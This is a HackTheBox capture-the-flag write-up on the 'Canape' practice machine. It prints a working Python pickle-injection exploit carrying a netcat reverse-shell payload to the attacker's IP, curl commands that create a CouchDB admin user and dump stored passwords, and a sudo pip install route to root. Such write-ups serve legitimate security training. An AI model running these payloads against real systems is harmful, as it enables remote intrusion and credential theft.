HackTheBox Writeup — Canape

Faisal Husaini

Sep 15, 2018·6 min read

Hello Guys , I am Faisal Husaini and this is my first writeup on Medium and also the first writeup in any platform on the web. My username on HTB is “faisalelino” .

This writeup is on Canape box which is one of the hardest box on HTB. But the experience was great while solving this machine as I learned about alot of stuffs while solving this machine.

The IP for this machine is 10.10.10.70 , so let’s get started

NMAP Results

We see that port 80 is open running Apache httpd 2.4.18 .Also if you notice in the results , we can see that there is a /git directory in the web server , lets see what does it contain

/.git

So we access 10.10.10.70/.git in the browser , we get

There is a directory listing and also a “config” file in it , lets see what does it contain

We see it has a “url=http://git.canape.htb/simpsons.git” , so let’s clone the file , but before that , we have to add “canape.htb” and “git.canape.htb” to our host file like this

Now lets clone the file from the url we got..

We got the simpsons folder containing some files , lets see the files in it

We see it has a __init__.py file containing some code , but the main thing to point out is the cPickle module imported , which means that there might be a Pickle Injection Vulnerability , lets dig further more

Pickle Injection Vulnerability

As we came to know that it might have a pickle injection vulnerability , so I referred to a blog to learn more about it as I was not much aware of this vulnerability

We need to create a python script exploit to trigger the vulnerability

import os
import cPickle
from hashlib import md5
import requests
# Exploit that we want the target to unpickle
class Exploit(object):
def __reduce__(self):
return (os.system, (‘homer;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.89 1234 >/tmp/f’,))
shellcode = cPickle.dumps(Exploit())
print shellcode + “\n”
print md5(shellcode).hexdigest()
part1 = str(shellcode.split(“;”)[0])
part2 = str(“;”+shellcode.split(“;”)[1])
part3 = str(“;”+shellcode.split(“;”)[2])
part4 = str(“;”+shellcode.split(“;”)[3])
r = requests.post(“http://10.10.10.70/submit", data={‘character’: str(part1), ‘quote’:str(part2 + part3 + part4)})
print(r.status_code, r.reason, r.text)
r2 = requests.post(“http://10.10.10.70/check", data={‘id’: md5(shellcode).hexdigest()})
print(r2.status_code, r2.reason, r2.text)

Please do the give the gaps after the class and functions as medium isn’t supporting tabs

So after getting everything ready , we set up a netcat listener on port 1234 as I gave that port to get the reverse connection on the python-exploit.py script , so now lets the exploit

Reverse Connection Through Python Pickle Injection

Cool! We got a reverse connection , now lets further dig it up

As we got the shell , lets get a tty using python

CouchDB Privelege Escalation

As we are www-data , so we cant get access to the user “Homer” on this box.

Let’s run “ps aux | grep homer” , and see what processes are running from the Homer user

We can see that it is running couchdb , so lets search for Couchdb exploit or privilege escalation methods

Here we use curl commands to create a admin user in the couchdb database and also get the complete user and password from it

curl -X PUT ‘http://127.0.0.1:5984/_users/org.couchdb.user:faisal' — data-binary ‘{“type”:”user”,”name”:”faisal”,”roles”:[“_admin”],”roles”:[],”password”:”toor”}’

Creating our own user on the database

We have successfully created a user in the db , to confirm we use the below command

curl -X GET ‘http://faisal:toor@127.0.0.1:5984/_users/_all_docs'

Here we confirm that the user we created for the db has successfully being created

Now we dump the username and password from the db using the below command:

curl -X GET ‘http://faisal:toor@127.0.0.1:5984/passwords/_all_docs?include_docs=true'

From the dumped data , we can see that there is password for the user “homer” which is “h02ddjdj2k2k2”

Let’s try to connect to the user using “su homer” and then providing the password

It fails , hmmm , also we see that there was only port 80 open from the nmap scan we did … but the dump also has a password for ssh, i.e , “0B4jyA0xtytZi7esBNGp”, with no user given.

Maybe it is the ssh password for the user “homer”, but we see no SSH Port open from the normal nmap scan we did before , so lets try the full nmap scan using the command below:

nmap -sV -sC 10.10.10.70 -p- — min-rate 1000

We see that there one more port open , i.e , 65535 , which for me was a complete troll to me :P as I was hitting my head so get connected to “homer” user

Lets try connecting to the user “homer” through ssh

SSH Connection

We try to connect to ssh using the command below:

ssh homer@10.10.10.70 -p 65535
Password: 0B4jyA0xtytZi7esBNGp

Bingo! We got in , lets now dig into it and get the user flag and root flag (which still requires a full privilege escalation for root flag)

When we type the “sudo -l” command , we get that we can use sudo with /usr/bin/pip install *

So lets exploit it using that , but first we create a python script so that we can get a reverse shell back to us when we pip install , after we set up a netcat listener to get the reverse shell back

Python Script To Exploit /usr/bin/pip install * as sudo

Here is our code ready and now lets do the exploitation part

We use the following command:

sudo /usr/bin/pip install . — upgrade — force-reinstall

Also set up a nc listener on our host machine

All set , now time to exploit

Voila!! We got root , now time to get both of the flags…!

Getting User Flag

The user flag is in the home directory of user “homer”

We got the user flag

Getting Root Flag

The root flag is under the /root directory

We got the root.flag as well

Vulnerabilities Used To Exploit This Box

Vulnerabilities in the box as follows :-

1) Python Pickle Injection → To get RCE and get a low privilege shell
2) CouchDB →To get user privileges from www-data
3) Running sudo as /usr/bin/pip install * → To get root access